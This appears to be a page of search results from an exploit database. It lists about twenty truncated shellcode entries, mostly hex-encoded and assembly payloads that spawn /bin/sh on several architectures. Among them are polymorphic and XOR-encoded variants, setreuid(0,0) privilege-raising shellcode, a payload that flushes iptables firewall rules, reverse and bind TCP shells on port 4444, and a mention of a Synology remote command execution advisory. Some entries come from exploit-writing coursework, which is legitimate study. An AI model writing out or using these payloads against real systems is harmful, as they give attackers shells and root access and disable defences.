1131 matches found
Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (26 bytes)
Linux/x86 - execve/bin/sh + Polymorphic Shellcode 26 bytes. Shellcode exploit for Linuxx86 platform / Description ; Title : Polymorphic execve /bin/sh - Shellcode ; Author : Hashim Jawad ; Website : ihack4falafel.com ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : spawn /bin/sh shell...
IRIX - execve (/bin/sh -c) Shellcode (72 bytes)
char cmdshellcode= "\x04\x10\xff\xff" / bltzal $zero, / "\x24\x02\x03\xf3" / li $v0,1011 / "\x23\xff\x08\xf4" / addi $ra,$ra,2292 / "\x23\xe4\xf7\x40" / addi $a0,$ra,-2240 / "\x23\xe5\xfb\x24" / addi $a1,$ra,-1244 / "\xaf\xe4\xfb\x24" / sw $a0,-1244$ra / "\x23\xe6\xf7\x48" / addi $a2,$ra,-2232 /...
Linux/StrongARM - execve (/bin/sh) Shellcode (47 bytes)
/ 47 byte StrongARM/Linux execve shellcode funkysh / char shellcode= "\x02\x20\x42\xe0" / sub r2, r2, r2 / "\x1c\x30\x8f\xe2" / add r3, pc, 28 0x1c / "\x04\x30\x8d\xe5" / str r3, sp, 4 / "\x08\x20\x8d\xe5" / str r2, sp, 8 / "\x13\x02\xa0\xe1" / mov r0, r3, lsl r2 / "\x07\x20\xc3\xe5" / strb r2, r...
IRIX - execve (/bin/sh) Shellcode (68 bytes)
/ 68 byte MIPS/Irix PIC execve shellcode. -scut/teso / unsigned long int shellcode = 0xafa0fffc, / sw $zero, -4$sp / 0x24067350, / li $a2, 0x7350 / / dpatch: / 0x04d0ffff, / bltzal $a2, dpatch / 0x8fa6fffc, / lw $a2, -4$sp / / a2 = char envp = NULL / 0x240fffcb, / li $t7, -53 / 0x01e07827, / nor...
Linux/x86-64 - execve (/sbin/iptables, [/sbin/iptables, -F], NULL) Shellcode (43 bytes)
/ section .text global start start: push 0x3b pop rax cdq push rdx push word 0x462d push rsp pop rcx push rdx mov rbx, 0x73656c6261747069 push rbx mov rbx, 0x2f2f2f6e6962732f push rbx push rsp pop rdi push rdx push rcx push rdi push rsp pop rsi ; execve"/sbin/iptables", "/sbin/iptables", "-F",...
Linux/ARM - execve (/bin/sh,NULL,0) Shellcode (31 bytes)
/ Title: Linux/ARM - execve"/bin/sh",NULL,0 - 31 bytes Date: 2010-08-31 Tested: ARM926EJ-S rev 5 v5l Author: Jonathan Salwan - twitter: @jonathansalwan shell-storm.org Shellcode ARM without 0x20, 0x0a and 0x00 00008054 : 8054: e28f3001 add r3, pc, 1 ; 0x1 8058: e12fff13 bx r3 805c: 4678 mov r0, p...
Linux/SPARC - setreuid(0,0) + execve(/bin/sh) Shellcode (64 bytes)
/ Linux/SPARC setreuid0,0; execve of /bin/sh shellcode. / char c0de = / anathema / / setreuid0,0; / "\x82\x10\x20\x7e" / mov 126, %g1 / "\x92\x22\x40\x09" / sub %o1, %o1, %o1 / "\x90\x0a\x40\x09" / and %o1, %o1, %o0 / "\x91\xd0\x20\x10" / ta 0x10 / / execve of /bin/sh / "\x2d\x0b\xd8\x9a" / sethi...
Linux/SuperH (sh4) - execve(/bin/sh, 0, 0) Shellcode (19 bytes)
/ | Title: Linux/SuperH - sh4 execve"/bin/sh", 0, 0 - 19 bytes | Date: 2011-06-22 | Tested on: Debian-sh4 2.6.32-5-sh7751r | Author: Florian Gaultier - agix - twitter: @Agixid | | http://shell-storm.org / include include int main char shell = "\x0b\xe3"// mov 11,r3 "\x02\xc7"// mova @10,pc,r0...
Linux/SPARC - setreuid(0,0) + standard execve() Shellcode (72 bytes)
/ Linux/SPARC setreuid0, 0; necessary, /bin/sh drops privs, standard execve. / char c0de = / by michel kaempf / / setuid 0 ; / "\x90\x1a\x40\x09\x82\x10\x20\x17\x91\xd0\x20\x10" / setgid 0 ; / "\x90\x1a\x40\x09\x82\x10\x20\x2e\x91\xd0\x20\x10" / Aleph One : /...
FreeBSD/x86-64 - execve /bin/sh Shellcode (28 bytes)
/ Gitsnik, @dracyrys FreeBSD x8664 execve, 28 bytes / C source: char code = \ "\x48\x31\xc9\x48\xf7\xe1\x04\x3b\x48\xbb" "\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x52\x53" "\x54\x5f\x52\x57\x54\x5e\x0f\x05"; Intel Assembly: global start ; ; 28 byte execve FreeBSD x8664 ; ; gitsnik@bsd64$ nasm -f elf64...
Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)
/ Title: Linux/x86 - execve/bin/sh Polymorphic Shellcode 53 bytes Date: 10-Jan-2018 Exploit Author: Debashis Pal SLAE-1122 Tested on: i686 GNU/Linux '//bin/sh' = 0x68732f6e 0x69622f2f polymorphic.nasm global start section .text start: add esi, 0x30 ;junk xor ecx, ecx mul ecx mov dword esp-4, ecx...
Linux/x86 - execve /bin/dash Shellcode (30 bytes)
/ Description ; Title : exec /bin/dash - Shellcode ; Author : Hashim Jawad ; Website : ihack4falafel.com ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : spawn /bin/dash shell ; OS : Linux ; Arch : x86 ; Size : 30 bytes dash.nasm global start section .text start: ; push NULL into the...
Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (53 bytes)
Linux/x86 - execve/bin/sh + Polymorphic Shellcode 53 bytes. Shellcode exploit for Linuxx86 platform / Title: Linux/x86 - execve/bin/sh Polymorphic Shellcode 53 bytes Date: 10-Jan-2018 Exploit Author: Debashis Pal SLAE-1122 Tested on: i686 GNU/Linux '//bin/sh' = 0x68732f6e 0x69622f2f...
Linux/x86 - execve(/bin/dash) Shellcode (30 bytes)
Linux/x86 - execve/bin/dash Shellcode 30 bytes. Shellcode exploit for Linuxx86 platform / Description ; Title : exec /bin/dash - Shellcode ; Author : Hashim Jawad ; Website : ihack4falafel.com ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : spawn /bin/dash shell ; OS : Linux ; Arch :...
Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator)
Linux/x64 - Custom Encoded XOR + Polymorphic + execve/bin/sh Shellcode Generator. Shellcode exploit for Generator platform !/usr/bin/python from random import randint encoded = "" encoded2 = "" badchars = 0x00 shellcode = "\x90" +...
Synology StorageManager smart.cgi Remote Command Execution
Vulnerability Summary The following advisory describes a remote command execution vulnerability found in Synology StorageManager. Storage Manager is “a management application that helps you organize and monitor the storage capacity on your Synology NAS. Depending on the model and number of...
Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (104 bytes)
Linux/x64 - Reverse TCP 127.0.0.1:4444/TCP Shell /bin/sh + Password 1234567 Shellcode 104 bytes. Shellcode exploit for Linuxx86-64 platform global start start: ; sock = socketAFINET, SOCKSTREAM, 0 ; AFINET = 2 ; SOCKSTREAM = 1 ; syscall number 41 push 41 pop rax push 2 pop rdi push 1 pop rsi cdq...
Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes)
/ Title: Linux/x86 - Polymorphic execve /bin/sh x86 shellcode - 30 bytes Author: Manuel Mancera @sinkmanu Tested on: Linux 3.16.0-4-586 1 Debian 3.16.43-2+deb8u2 2017-06-26 i686 GNU/Linux ----------------- Assembly code ------------------- global start section .text start: xor eax, eax push eax m...
Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes)
Linux/x86 - execve/bin/sh Polymorphic Shellcode 30 bytes. Shellcode exploit for Linx86 platform / Title: Linux/x86 - Polymorphic execve /bin/sh x86 shellcode - 30 bytes Author: Manuel Mancera @sinkmanu Tested on: Linux 3.16.0-4-586 1 Debian 3.16.43-2+deb8u2 2017-06-26 i686 GNU/Linux...
Linux/ARM (Raspberry Pi) - Bind TCP Shell (4444/TCP) Shellcode (192 bytes)
/ Andrea Sindoni - @invictus1306 This schellcode is part of my episodes: - ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/ Enviroment: Raspberry pi 3 Default settings for port:4444 @.syntax unified .global start start: mov r1, 0x5C @ r1=0x5c mov r5, 0x11 @...